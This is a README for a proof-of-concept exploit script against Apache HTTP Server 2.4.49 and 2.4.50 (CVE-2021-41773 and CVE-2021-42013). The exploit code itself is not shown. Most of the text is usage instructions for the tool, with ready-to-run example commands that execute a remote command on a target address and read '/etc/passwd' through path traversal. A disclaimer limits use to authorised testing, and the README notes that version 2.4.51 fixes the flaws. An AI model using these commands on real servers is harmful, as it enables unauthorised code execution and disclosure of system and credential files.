# Apache Path Traversal & RCE Exploit
**CVE-2021-41773 & CVE-2021-42013**
These are critical path traversal vulnerabilities affecting **Apache HTTP Server 2.4.49** and **2.4.50**.
They allow attackers to:
- Access files outside the web root (LFI)
- Achieve Remote Code Execution (RCE) if CGI is enabled
Both vulnerabilities are **patched in Apache 2.4.51**.
**Immediate upgrading is strongly recommended.**
---
## Usage
```bash
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
```
Examples
- Remote Code Execution:
````bash
python3 exploit.py --url http://192.168.1.10 --rce --command "id"
````

- Local File Inclusion:
```bash
python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"
````

---
## ⚠️ Disclaimer
This exploit script is for authorized security testing, defensive research, and educational purposes only.
---
## Official Channels
- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
[4.0K] /data/pocs/3a97e6f2026a11127c900fc34184278a71cb619d
├── [5.2K] exploit.py
└── [1.2K] README.md
0 directories, 2 files